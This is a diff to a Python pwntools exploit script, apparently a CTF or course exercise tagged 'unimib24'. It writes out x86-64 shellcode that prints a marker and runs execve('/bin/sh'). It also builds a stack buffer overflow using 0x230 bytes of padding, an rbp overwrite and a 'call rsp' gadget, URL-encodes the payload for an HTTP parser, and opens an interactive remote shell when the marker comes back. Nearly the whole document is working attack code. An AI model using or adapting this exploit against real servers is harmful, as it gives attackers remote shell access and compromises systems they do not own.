@@ -34,9 +34,9 @@ def run_expl():
3434 shellcode_payload = f"""
3535
3636 { c ("----------------------------------------" )}
37- { c ("This block is just to test the socket IO " )}
37+ { c ("print a marker string to test the socket" )}
3838 { c ("----------------------------------------" )}
39- mov rax, 0x6161616161616161
39+ mov rax, 0x343262696d696e75 { c ( "string unimib24" ) }
4040 push rax
4141 push rsp
4242 pop rsi { c ("pointer to the string" )}
@@ -75,13 +75,13 @@ def run_expl():
7575 mov rax, 0x0068732f6e69622f { c ("string /bin/sh" )}
7676 push rax
7777 push rsp
78- pop rdi { c ("pointer to the string" )}
78+ pop rdi { c ("pointer to the string" )}
7979
80- mov rax, 0x3b { c ("execve syscall" )}
80+ mov rax, 0x3b { c ("execve syscall" )}
8181 push 0
8282 push rsp
83- pop rsi { c (" *const *argv" )}
84- mov rdx, rsi { c (" *const *envp" )}
83+ pop rsi { c (" *const *argv" )}
84+ mov rdx, rsi { c (" *const *envp" )}
8585 syscall
8686 """
8787
@@ -90,11 +90,11 @@ def run_expl():
9090 print (shellcode_bytes )
9191
9292 # buffer overflow
93- padding_size = 0x230 # tiny no-protections
93+ padding_size = 0x230 # tiny no-protections
9494 expl = b''
9595 expl += b'a' * padding_size
96- expl += b'b' * 8 # overwrite rbp
97- expl += p64 (0x4283fb ) # gadget: call rsp;
96+ expl += b'b' * 8 # overwrite rbp
97+ expl += p64 (0x4283fb ) # gadget: call rsp;
9898 expl += shellcode_bytes
9999
100100 #url encode all the bytes that would block the http parser
@@ -110,11 +110,14 @@ def run_expl():
110110 out = p .recvuntil (b'File not found' )
111111 print (out )
112112
113- print ("--- exploit out---" )
114- #out = p.clean(timeout=1)
115- #print(out)
116- # p.close()
117-
118- p .interactive ()
113+ good_omen = p .recvuntil (b'unimib24' , timeout = 1 )
114+ if not good_omen :
115+ print ("exploitation failed" )
116+ out = p .clean (timeout = 1 )
117+ print (out )
118+ p .close ()
119+ else :
120+ print ("remote shell started! type a command" )
121+ p .interactive ()
119122
120123run_expl ()
0 commit comments